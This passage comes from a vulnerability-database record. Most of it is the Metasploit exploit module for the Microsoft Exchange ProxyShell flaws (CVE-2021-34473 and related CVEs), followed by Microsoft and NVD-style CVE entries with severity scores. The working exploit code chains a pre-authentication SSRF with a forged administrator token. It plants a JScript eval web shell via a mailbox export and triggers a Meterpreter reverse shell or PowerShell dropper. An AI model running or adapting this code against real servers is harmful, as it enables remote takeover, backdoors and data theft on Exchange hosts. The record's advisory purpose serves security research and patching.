'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ] \n], \n'DisclosureDate' => '2021-04-06', # pwn2own 2021 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]), \n]) \n \nregister_advanced_options([ \nOptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']), \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \nCheckCode::Vulnerable \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef request_autodiscover(_server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n'/autodiscover/autodiscover.xml', \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? \n \n{ server: server, legacy_dn: legacy_dn } \nend \n \ndef request_fqdn \nntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nreceived = send_request_raw( \n'method' => 'RPC_IN_DATA', \n'uri' => normalize_uri('rpc', 'rpcproxy.dll'), \n'headers' => { \n'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\" \n} \n) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nif received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i) \nhash = received['WWW-Authenticate'].split('NTLM ')[1] \nmessage = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash)) \ndns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME] \n \nreturn dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase \nend \n \nfail_with(Failure::NotFound, 'No Backend server was found') \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(_server_name, legacy_dn) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n'/mapi/emsmdb', \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response&.code == 200 \nsid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_34473 \nif datastore['BackendServerName'] && !datastore['BackendServerName'].empty? \nserver_name = datastore['BackendServerName'] \nprint_status(\"Internal server name forced to: #{server_name}\") \nelse \nprint_status('Retrieving backend FQDN over RPC request') \nserver_name = request_fqdn \nprint_status(\"Internal server name: #{server_name}\") \nend \n@backend_server_name = server_name \n \n# get information via an autodiscover request. \nprint_status('Sending autodiscover request') \nautodiscover = request_autodiscover(server_name) \n \nprint_status(\"Server: #{autodiscover[:server]}\") \nprint_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\") \n \n# get the user UID using mapi request. \nprint_status('Sending mapi request') \nmailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn]) \nprint_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\") \n \nsend_payload(mailbox_user_sid) \n@common_access_token = build_token(mailbox_user_sid) \nend \n \ndef send_http(method, uri, opts = {}) \nssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nunless opts[:cookie] == :none \nopts[:cookie] = \"Email=#{ssrf}\" \nend \n \nrequest = { \n'method' => method, \n'uri' => \"/#{ssrf}#{uri}\", \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype], \n'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' } \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef send_payload(user_sid) \n@shell_input_name = rand_text_alphanumeric(8..12) \n@draft_subject = rand_text_alphanumeric(8..12) \npayload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\")) \nfile_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\" \nenvelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject) \n \nsend_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8') \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \ndatastore['IISWritePath'].gsub('\\\\', '/') \nelse \ndatastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nend \n \ndef build_token(sid) \nuint8_tlv = proc do |type, value| \ntype + [value.length].pack('C') + value \nend \n \ntoken = uint8_tlv.call('V', \"\\x00\") \ntoken << uint8_tlv.call('T', 'Windows') \ntoken << \"\\x43\\x00\" \ntoken << uint8_tlv.call('A', 'Kerberos') \ntoken << uint8_tlv.call('L', datastore['EMAIL']) \ntoken << uint8_tlv.call('U', sid) \n \n# group data for S-1-5-32-544 \ntoken << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\" \nRex::Text.encode_base64(token) \nend \n \ndef execute_powershell(cmdlet, args: []) \nwinrm = SSRFWinRMConnection.new({ \nendpoint: full_uri('PowerShell/'), \ntransport: :ssrf, \nssrf_proc: proc do |method, uri, opts| \nuri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\" \nuri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nopts[:cookie] = :none \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>}, \n\"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\" \n) \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>}, \n\"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\" \n) \nsend_http(method, uri, opts) \nend \n}) \n \nwinrm.shell(:powershell) do |shell| \nshell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH) \nshell.extend(SSRFWinRMConnection::PowerShell) \nshell.run({ cmdlet: cmdlet, args: args }) \nend \nend \n \ndef exploit \n@ssrf_email ||= Faker::Internet.email \nprint_status('Attempt to exploit for CVE-2021-34473') \nrun_cve_2021_34473 \n \npowershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none) \nfail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200 \n \nprint_status('Assigning the \\'Mailbox Import Export\\' role') \nexecute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ]) \n \n@shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\" \nif datastore['UseAlternatePath'] \nunc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nelse \nunc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nend \n \nnormal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\') \nprint_status(\"Writing to: #{normal_path}\") \nregister_file_for_cleanup(normal_path) \n \n@export_name = rand_text_alphanumeric(8..12) \nexecute_powershell('New-MailboxExportRequest', args: [ \n{ name: '-Name', value: @export_name }, \n{ name: '-Mailbox', value: datastore['EMAIL'] }, \n{ name: '-IncludeFolders', value: '#Drafts#' }, \n{ name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" }, \n{ name: '-ExcludeDumpster' }, \n{ name: '-FilePath', value: unc_path } \n]) \n \nprint_status('Waiting for the export request to complete...') \n30.times do \nif execute_command('whoami')&.code == 200 \nprint_good('The mailbox export request has completed') \nbreak \nend \nsleep 5 \nend \n \nprint_status('Triggering the payload') \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nboundary = rand_text_alphanumeric(8..12) \nresponse = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\") \n \nprint_warning('Dumping command output in response') \nif response.body =~ /START#{boundary}(.*)END#{boundary}/m \nprint_line(Regexp.last_match(1).strip) \nelse \nprint_error('Empty response, no command output') \nend \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \ndef cleanup \nsuper \nreturn unless @common_access_token && @export_name \n \nprint_status('Removing the mailbox export request') \nexecute_powershell('Remove-MailboxExportRequest', args: [ \n{ name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" }, \n{ name: '-Confirm', value: false } \n]) \nend \n \ndef execute_command(cmd, _opts = {}) \nif !cmd_windows_generic? \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\" \nelse \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nend \n \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @shell_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@shell_input_name}=#{cmd}\" \n) \nend \nend \n \nclass PstEncoding \nENCODE_TABLE = [ \n71, 241, 180, 230, 11, 106, 114, 72, \n133, 78, 158, 235, 226, 248, 148, 83, \n224, 187, 160, 2, 232, 90, 9, 171, \n219, 227, 186, 198, 124, 195, 16, 221, \n57, 5, 150, 48, 245, 55, 96, 130, \n140, 201, 19, 74, 107, 29, 243, 251, \n143, 38, 151, 202, 145, 23, 1, 196, \n50, 45, 110, 49, 149, 255, 217, 35, \n209, 0, 94, 121, 220, 68, 59, 26, \n40, 197, 97, 87, 32, 144, 61, 131, \n185, 67, 190, 103, 210, 70, 66, 118, \n192, 109, 91, 126, 178, 15, 22, 41, \n60, 169, 3, 84, 13, 218, 93, 223, \n246, 183, 199, 98, 205, 141, 6, 211, \n105, 92, 134, 214, 20, 247, 165, 102, \n117, 172, 177, 233, 69, 33, 112, 12, \n135, 159, 116, 164, 34, 76, 111, 191, \n31, 86, 170, 46, 179, 120, 51, 80, \n176, 163, 146, 188, 207, 25, 28, 167, \n99, 203, 30, 77, 62, 75, 27, 155, \n79, 231, 240, 238, 173, 58, 181, 89, \n4, 234, 64, 85, 37, 81, 229, 122, \n137, 56, 104, 82, 123, 252, 39, 174, \n215, 189, 250, 7, 244, 204, 142, 95, \n239, 53, 156, 132, 43, 21, 213, 119, \n52, 73, 182, 18, 10, 127, 113, 136, \n253, 157, 24, 65, 125, 147, 216, 88, \n44, 206, 254, 36, 175, 222, 184, 54, \n200, 161, 128, 166, 153, 152, 168, 47, \n14, 129, 101, 115, 228, 194, 162, 138, \n212, 225, 17, 208, 8, 139, 42, 242, \n237, 154, 100, 63, 193, 108, 249, 236 \n].freeze \n \ndef self.encode(data) \nencoded = '' \ndata.each_char do |char| \nencoded << ENCODE_TABLE[char.ord].chr \nend \nencoded \nend \nend \n \nclass XMLTemplate \ndef self.render(template_name, context = nil) \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\") \ntemplate = ::File.binread(file_path) \ncase context \nwhen Hash \nb = binding \nlocals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" } \nb.eval(locals.join) \nelse \nraise ArgumentError \nend \nb.eval(Erubi::Engine.new(template).src) \nend \nend \n \nclass SSRFWinRMConnection < WinRM::Connection \nclass MessageFactory < WinRM::PSRP::MessageFactory \ndef self.create_pipeline_message(runspace_pool_id, pipeline_id, command) \nWinRM::PSRP::Message.new( \nrunspace_pool_id, \nWinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline], \nXMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]), \npipeline_id \n) \nend \nend \n \n# we have to define this class so we can define our own transport factory that provides one backed by the SSRF \n# vulnerability \nclass TransportFactory < WinRM::HTTP::TransportFactory \nclass HttpSsrf < WinRM::HTTP::HttpTransport \n# rubocop:disable Lint/ \ndef initialize(endpoint, options) \n@endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint \n@ssrf_proc = options[:ssrf_proc] \nend \n \ndef send_request(message) \nresp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message }) \nWinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml \nend \nend \n \ndef create_transport(connection_opts) \nraise NotImplementedError unless connection_opts[:transport] == :ssrf \n \nsuper \nend \n \nprivate \n \ndef init_ssrf_transport(opts) \nHttpSsrf.new(opts[:endpoint], opts) \nend \nend \n \nmodule PowerShell \ndef send_command(command, _arguments) \ncommand_id = SecureRandom.uuid.to_s.upcase \nmessage = MessageFactory.create_pipeline_message(@runspace_id, command_id, command) \nfragmenter.fragment(message) do |fragment| \ncommand_args = [connection_opts, shell_id, command_id, fragment] \nif fragment.start_fragment \nresp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build) \ncommand_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text \nelse \ntransport.send_request(WinRM::WSMV::SendData.new(*command_args).build) \nend \nend \n \ncommand_id \nend \nend \n \ndef initialize(connection_opts) \n# these have to be set to truthy values to pass the option validation, but they're not actually used because hax \nconnection_opts.merge!({ user: :ssrf, password: :ssrf }) \nsuper(connection_opts) \nend \n \ndef transport \n@transport ||= begin \ntransport_factory = TransportFactory.new \ntransport_factory.create_transport(@connection_opts) \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163895/exchange_proxyshell_rce.rb.txt"}], "mscve": [{"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31206", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:29", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31196", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-16T04:52:14", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-31206", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-20T12:20:00", "id": "PRION:CVE-2021-31206", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T05:58:10", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-34473", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-34473", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T04:51:57", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "prion", "title": "CVE-2021-31196", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 